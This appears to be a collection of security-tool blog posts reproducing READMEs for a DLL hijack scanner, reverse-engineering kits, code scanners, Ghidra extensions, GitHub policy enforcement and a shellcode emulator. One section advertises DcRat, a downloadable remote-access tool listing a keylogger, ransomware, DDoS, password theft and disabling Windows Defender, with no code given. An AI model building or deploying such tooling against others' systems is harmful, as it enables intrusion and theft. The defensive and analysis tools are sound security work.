
DLLHSC - DLL Hijack SCanner A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking

15 March 2021 at 11:30
By: Zion3R


DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking


Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and last but not least the compiled executables for x86 and x64 architecture (in the release section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. The DLLHSC project implements the core functionality of this tool. The detour project generates a DLL that is used to hook APIs, and the payload project generates the DLL that is used as a proof of concept to check whether the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory as DLLHSC and detour, named payload32.dll for x86 or payload64.dll for x64 architecture.


Modes of operation

The tool implements 3 modes of operation which are explained below.


Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referred to in the Import table with a payload DLL.

The tool places in the application directory only a module (DLL) that is not already present in the application directory, does not belong to WinSxS and is not listed in the KnownDLLs registry key.

The payload DLL upon execution creates a file in the following path: C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as a proof of execution. The tool launches the application and reports whether the payload DLL was executed by checking if the temporary file exists. As some executables import functions from the DLLs they load, error message boxes may pop up when the provided DLL fails to export these functions and thus fails to meet the dependencies of the provided image. However, the message boxes indicate that the DLL may be a good candidate for payload execution if the dependencies are met; in this case, additional analysis is required. The title of these message boxes may contain the strings Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they show up and reports the results.
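That proof-of-execution check is easy to reproduce. Here is a small Windows-only Python sketch of the logic described above (an illustration only, not DLLHSC's code; the target path is an example):

import os
import subprocess
import time

# Marker file dropped by the payload DLL, per the description above.
MARKER = os.path.expandvars(r"C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp")

def payload_executed(exe_path, timeout=10):
    if os.path.exists(MARKER):
        os.remove(MARKER)  # start clean so an old run cannot give a false positive
    proc = subprocess.Popen([exe_path], cwd=os.path.dirname(exe_path))
    time.sleep(timeout)    # give the loader time to run the payload's DllMain
    proc.kill()
    return os.path.exists(MARKER)

print(payload_executed(r"C:\tools\oleview\OleView.exe"))  # example target path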


List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool only reports the modules loaded from the System directory that do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check if the application loads the provided module instead.


Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded in run-time.

Each time the scanned application calls LoadLibrary or LoadLibraryEx, the tool intercepts the call and writes the requested module to the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If LoadLibraryEx is called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, no output is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory, and modules with no full path (for these modules the loader applies the normal search order).
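As an illustration of that filtering, here is a Windows-only Python sketch (my own sketch, assuming the log holds one module path per line; it is not part of DLLHSC) that reads the run-time log and keeps only the leads described above:

import os
import winreg

LOG = os.path.expandvars(r"C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp")
SYSTEM_DIR = os.path.expandvars(r"%SystemRoot%\System32")

def known_dlls():
    # Enumerate the KnownDLLs registry key consulted by the Windows loader.
    key = winreg.OpenKey(
        winreg.HKEY_LOCAL_MACHINE,
        r"SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs")
    names, i = set(), 0
    while True:
        try:
            _, value, _ = winreg.EnumValue(key, i)
            names.add(str(value).lower())
            i += 1
        except OSError:  # no more values
            return names

known = known_dlls()
with open(LOG) as log:
    for line in log:
        module = line.strip()
        if not module or os.path.basename(module).lower() in known:
            continue  # empty line, or served from KnownDLLs: not hijackable
        if not os.path.dirname(module):
            print(f"[lead] no full path, normal search order applies: {module}")
        elif not os.path.exists(os.path.join(SYSTEM_DIR, os.path.basename(module))):
            print(f"[lead] not present in the System directory: {module}")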


Compile and Run Guidance

Should you choose to compile the tool from source, it is recommended to do so with Visual Studio 2019. In order for the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated by the payload project has to be renamed to payload32.dll for 32-bit architecture or payload64.dll for 64-bit architecture.


Help menu

The help menu for this application

NAME
dllhsc - DLL Hijack SCanner

SYNOPSIS
dllhsc.exe -h

dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DESCRIPTION
DLLHSC scans a given executable image for DLL Hijacking and reports the results

It requires elevated privileges

OPTIONS
-h, --help
display this help menu and exit

-e, --executable-image
executable image to scan

-l, --lightweight
parse the import table, attempt to launch a payload and report the results

-lm, --list-modules
list loaded modules that do not exist in the application's directory

-rt, --runtime-load
display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

-t, --timeout
number of seconds to wait for checking any popup error windows - defaults to 10 seconds


Example Runs

This section provides examples of how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop an error message box when dependencies for the payload DLL (exported functions) are not met. DLLHSC checks for an open message box for 10 seconds by default, or for as many seconds as specified by the user with the flag -t. An error message box indicates that if the dependencies are met, the module can be weaponized.

The following screenshot shows the error message box generated when OleView.exe loads the payload DLL:



The tool waits for a maximum timeframe of 10 seconds or -t seconds to make sure the process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:



The flag -lm launches the provided executable and prints the modules it loads that neither belong to the KnownDLLs list nor are WinSxS dependencies. This mode aims to give an idea of DLLs that may be used as payloads, and it exists only to generate leads for the analyst.



The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.



Feedback

For any feedback on this tool, please use the GitHub Issues section.



Retoolkit - Reverse Engineer's Toolkit

26 March 2021 at 11:30
By: Zion3R


This is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder on your desktop with shortcuts to RE tools.


Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.


Included tools

Check the wiki.



Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.


Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribute the software, please file a request here.



Php_Code_Analysis - Scan your PHP code for vulnerabilities


This script will scan your code

The script can detect:

  1. check_file_upload issues
  2. host_header_injection
  3. SQL injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

Features:
  1. Fast
  2. Simple report

Usage:
python code.py <file name> >>> this will scan one file
python code.py >>> this will scan full folder (.)
python code.py <path> >>> scan full folder
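For illustration, here is a minimal Python sketch of how such a regex-based scanner can work (the patterns below are toy examples of my own, not the script's actual rules):

import pathlib
import re
import sys

# Toy patterns in the spirit of the checks listed above; real detection
# requires far more precise rules and context analysis.
PATTERNS = {
    "command_injection": re.compile(
        r"\b(exec|shell_exec|system|passthru)\s*\(\s*\$_(GET|POST|REQUEST)"),
    "LFI": re.compile(
        r"\b(include|require)(_once)?\s*\(?\s*\$_(GET|POST|REQUEST)"),
    "XSS": re.compile(r"\becho\s+\$_(GET|POST|REQUEST)"),
}

def scan(path):
    code = pathlib.Path(path).read_text(errors="ignore")
    for name, pattern in PATTERNS.items():
        for match in pattern.finditer(code):
            line = code.count("\n", 0, match.start()) + 1
            print(f"{path}:{line}: possible {name}: {match.group(0)}")

# One file if given, otherwise every .php file under the current folder.
targets = sys.argv[1:] or pathlib.Path(".").rglob("*.php")
for target in targets:
    scan(target)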

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET), causing many more unintended collisions. As such, analytical results may vary between this plugin and Pharos fn2hash.
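The collision caveat is easier to picture with the position-independent-code (PIC) hashing idea behind fn2hash: bytes that encode addresses are zeroed out before hashing, so relocated but otherwise identical functions hash the same, and a one-instruction RET function has the same hash in every program. A toy Python illustration (the byte/mask pairs are invented for the example, not Kaiju's implementation):

import hashlib

def pic_hash(instructions):
    # Each instruction is (raw_bytes, operand_mask); mask bytes of 0xFF mark
    # positions that encode addresses and get zeroed before hashing.
    picked = bytearray()
    for raw, mask in instructions:
        picked.extend(b & ~m & 0xFF for b, m in zip(raw, mask))
    return hashlib.md5(bytes(picked)).hexdigest()

# mov eax, [0x00403000] -- the absolute address bytes are masked out
mov = (bytes.fromhex("a100304000"), bytes([0x00, 0xFF, 0xFF, 0xFF, 0xFF]))
ret = (bytes.fromhex("c3"), bytes([0x00]))

# The same code loaded at a different address hashes identically:
mov_reloc = (bytes.fromhex("a100405000"), bytes([0x00, 0xFF, 0xFF, 0xFF, 0xFF]))
print(pic_hash([mov, ret]) == pic_hash([mov_reloc, ret]))  # True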


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputting the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file, example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or cannot be set, you can also specify it on the command line with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to update your AUTOCATS clone whenever you pull the latest Kaiju source code, to ensure the two stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process can now auto-remove previous installs of Kaiju if you enable this feature. To enable the autoremove, add the "KAIJU_AUTO_REMOVE" property to your install command, for example (assuming the environment variable is set as in the previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


DcRat - A Simple Remote Tool Written In C#

12 July 2021 at 21:30
By: Zion3R


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and secure
  • Server IP and port can be obtained through a link
  • Multi-server, multi-port support
  • Plugin system through DLLs, with strong extensibility
  • Super tiny client size (about 40-50 KB)
  • Data transfer with MessagePack (more compact than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDoS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass Uac
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build: Visual Studio 2019
  • Runtime:
    Server: .NET Framework 4.6.1
    Client and others: .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealers (only Chrome and Edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun function
  • Information Collection(Maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • …

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the latest release.


Attention

I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you automatically agree with the above content.


Thanks


Jsleak - A Go Code To Detect Leaks In JS Files Via Regex Patterns

18 August 2021 at 21:30
By: Zion3R


jsleak is a tool to identify sensitive data in JS files through regex patterns. Although it's built for this, you can use it to identify anything as long as you have a regex pattern for it.


How to install

Directly:

{your package manager} install pkg-config libpcre++-dev
go get github.com/0xTeles/jsleak/v2/jsleak

Compiled: release page


How to use
Usage of jsleak:
-json string
[+] Json output file
-pattern string
[+] File contains patterns to test
-verbose
[+] Verbose Mode

Demo
cat urls.txt | jsleak -pattern regex.txt
[+] Url: http://localhost/index.js
[+] Pattern: p([a-z]+)ch
[+] Match: peach
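For illustration, a rough Python equivalent of the flow above (a sketch of the idea, not the Go implementation) reads URLs from stdin, fetches each body, and applies every pattern from a file:

import re
import sys
import urllib.request

# usage: cat urls.txt | python jsleak_sketch.py regex.txt
# One regex per line in the pattern file, as in the demo above.
patterns = [re.compile(line.strip())
            for line in open(sys.argv[1]) if line.strip()]

for url in sys.stdin:
    url = url.strip()
    try:
        body = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "ignore")
    except Exception:
        continue  # unreachable host, TLS error, etc.
    for pattern in patterns:
        for match in pattern.finditer(body):
            print(f"[+] Url: {url}")
            print(f"[+] Pattern: {pattern.pattern}")
            print(f"[+] Match: {match.group(0)}")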

To Do
  • Fix output
  • Add more patterns
  • Add stdin
  • Implement JSON input
  • Fix patterns
  • Implement PCRE

Regex list

Inspired by

Thanks

@fepame, @gustavorobertux, @Jhounx, @arthurair_es



Allstar - GitHub App To Set And Enforce Security Policies

19 August 2021 at 12:30
By: Zion3R


Allstar is a GitHub App installed on organizations or repositories to set and enforce security policies. Its goal is to be able to continuously monitor and detect any GitHub setting or repository file contents that may be risky or do not follow security best practices. If Allstar finds a repository to be out of compliance, it will take an action such as create an issue or restore security settings.

The specific policies are intended to be highly configurable, to try to meet the needs of different project communities and organizations. Also, developing and contributing new policies is intended to be easy.

Allstar is developed under the OpenSSF organization, as a part of the Securing Critical Projects Working Group. The OpenSSF runs an instance of Allstar here for anyone to install and use on their GitHub organizations. However, Allstar can be run by anyone if need be, see the operator docs for more details.


Quick start

Install Allstar GitHub App on your organizations and repositories. When installing Allstar, you may review the permissions requested. Allstar asks for read access to most settings and file contents to detect security compliance. It requests write access to issues to create issues, and to checks to allow the block action.

Follow the quick start instructions to setup the configuration files needed to enable Allstar on your repositories. For more details on advanced configuration, see below.


Help! I'm getting issues created by Allstar and I don't want them.

Enable Configuration

Allstar can be enabled on individual repositories at the app level, with the option of enabling or disabling each security policy individually. For organization-level configuration, create a repository named .allstar in your organization. Then create a file called allstar.yaml in that repository.

Allstar can either be set to an opt-in or opt-out strategy. In opt-in, only those repositories explicitly listed are enabled. In opt-out, all repositories are enabled, and repositories would need to be explicitly added to opt-out. Allstar is set to opt-in by default, and therefore is not enabled on any repository immediately after installation. To continue with the default opt-in strategy, list the repositories for Allstar to be enabled on in your organization like so:

optConfig:
  optInRepos:
    - repo-one
    - repo-two

To switch to the opt-out strategy (recommended), set that option to true:

optConfig:
  optOutStrategy: true

If you wish to enable Allstar on all but a few repositories, you may use opt-out and list the repositories to disable:

optConfig:
  optOutStrategy: true
  optOutRepos:
    - repo-one
    - repo-two

Repository Override

Individual repositories can also opt in or out using configuration files inside those repositories. For example, if the organization is configured with the opt-out strategy, a repository may opt itself out by including the file .allstar/allstar.yaml with the contents:

optConfig:
  optOut: true

Conversely, this allows repositories to opt-in and enable Allstar when the organization is configured with the opt-in strategy. Because opt-in is the default strategy, this is how Allstar works if the .allstar repository doesn't exist.

At the organization-level allstar.yaml, repository override may be disabled with the setting:

optConfig:
  disableRepoOverride: true

This allows an organization-owner to have a central point of approval for repositories to request an opt-out through a GitHub PR. Understandably, Allstar or individual policies may not make sense for all repositories.


Policy Enable

Each individual policy configuration file (see below) also contains the exact same optConfig configuration object. This allows granularity to enable policies on individual repositories. A policy will not take action unless it is enabled and Allstar is enabled as a whole.


Definition

Actions

Each policy can be configured with an action that Allstar will take when it detects a repository to be out of compliance.

  • log: This is the default action, and actually takes place for all actions. All policy run results and details are logged. Logs are currently only visible to the app operator, plans to expose these are under discussion.
  • issue: This action creates a GitHub issue. Only one issue is created per policy, and the text describes the details of the policy violation. If the issue is already open, it is pinged with a comment every 24 hours (not currently user configurable). Once the violation is addressed, the issue will be automatically closed by Allstar within 5-10 minutes.
  • fix: This action is policy specific. The policy will make the changes to the GitHub settings to correct the policy violation. Not all policies will be able to support this (see below).

Proposed but not yet implemented actions (definitions will be added in the future):

  • block: Allstar can set a GitHub Status Check and block any PR in the repository from being merged if the check fails.
  • email: Allstar would send an email to the repository administrator(s).
  • rpc: Allstar would send an rpc to some organization-specific system.

Policies

Similar to the Allstar app enable configuration, all policies are enabled and configured with a yaml file in either the organization's .allstar repository or the repository's .allstar directory. As with the app, policies are opt-in by default, and the default log action won't produce visible results. A simple way to enable all policies is to create a yaml file for each policy with the contents:

optConfig:
  optOutStrategy: true
  action: issue

The fix action is not implemented in any policy yet, but will be implemented in those policies where it is applicable soon.


Branch Protection

This policy's config file is named branch_protection.yaml, and the config definitions are here.

The branch protection policy checks that GitHub's branch protection settings are setup correctly according to the specified configuration. The issue text will describe which setting is incorrect. See GitHub's documentation for correcting settings.


Binary Artifacts

This policy's config file is named binary_artifacts.yaml, and the config definitions are here.

This policy incorporates the check from scorecard. Remove the binary artifact from the repository to achieve compliance. As the scorecard results can be verbose, you may need to run scorecard itself to see all the detailed information.


Outside Collaborators

This policy's config file is named outside.yaml, and the config definitions are here.

This policy checks if any Outside Collaborators have either administrator (default) or push (optional) access to the repository. Only organization members should have this access; otherwise untrusted members could change admin-level settings and commit malicious code.


SECURITY.md

This policy's config file is named security.yaml, and the config definitions are here.

This policy checks that the repository has a security policy file in SECURITY.md and that it is not empty. The created issue will have a link to the GitHub tab that helps you commit a security policy to your repository.


Future Policies

Example Config Repository

See this repo as an example of Allstar config being used. As the organization administrator, consider a README.md with some information on how Allstar is being used in your organization.


Contribute Policies

Interface definition.

Both the SECURITY.md and Outside Collaborators policies are quite simple to understand and good examples to copy.



REW-sploit - Emulate And Dissect MSF And *Other* Attacks

19 August 2021 at 21:30
By: Zion3R


REW-sploit

The tool has been presented at Black-Hat Arsenal USA 2021

https://www.blackhat.com/us-21/arsenal/schedule/index.html#rew-sploit-dissecting-metasploit-attacks-24086

Slides of presentation are available at https://github.com/REW-sploit/REW-sploit_docs


Need help analyzing Windows shellcode, or an attack coming from the Metasploit Framework or Cobalt Strike (or maybe other malicious or obfuscated code)? Do you need to automate tasks with simple scripting? Do you want help decrypting MSF-generated traffic by extracting keys from payloads?

REW-sploit is here to help Blue Teams!

Here's a quick demo:


Install

Installation is very easy. I strongly suggest creating a dedicated Python environment for it:

# python -m venv <your-env-path>/rew-sploit
# source <your-env-path>/bin/activate
# git clone https://github.com/REW-sploit/REW-sploit.git
# cd REW-sploit
# pip install -r requirements.txt
# ./apply_patch.py -f
# ./rew-sploit

If you prefer, you can use the Dockerfile. To create the image:

docker build -t rew-sploit/rew-sploit .

and then start it (sharing the /tmp/ folder):

docker run --rm -it --name rew-sploit -v /tmp:/tmp rew-sploit/rew-sploit

You will notice an apply_patch.py script in the installation sequence. This is required to apply a small patch to the speakeasy-emulator (https://github.com/fireeye/speakeasy/) to make it compatible with REW-sploit. You can easily revert the patch with ./apply_patch.py -r if required.

Optionally, you can also install Cobalt-Strike Parser:

# cd REW-sploit/extras
# git clone https://github.com/Sentinel-One/CobaltStrikeParser.git

Standing on the shoulder of giants

REW-sploit is based on a couple of great frameworks, Unicorn and speakeasy-emulator (but also other libraries). Thanks to everyone and thanks to the OSS movement!


How it works

In general we can say that whilst Red Teams have a lot of tools helping them to automate attacks, Blue Teams are a bit tool-less. So I thought I would build something to help Blue Team analysis.

REW-sploit can take a shellcode/DLL/EXE, emulate the execution, and give you a set of information to help you understand what is going on. Examples of extracted information are:

You can find several examples of the current capabilities below:


Fixups

In some cases emulation was simply breaking, for different reasons; sometimes the obfuscation used techniques that confused the emulation engine. So I implemented some ad-hoc fixups (you can enable them with the -F option of the emulate_payload command). Fixups are implemented in modules/emulate_fixups.py. Currently we have:

Unicorn issue #1092:

#
# Fixup #1
# Unicorn issue #1092 (XOR instruction executed twice)
# https://github.com/unicorn-engine/unicorn/issues/1092
# #820 (Incorrect memory view after running self-modifying code)
# https://github.com/unicorn-engine/unicorn/issues/820
# Issue: self-modifying code in the same Translated Block (16 bytes?)
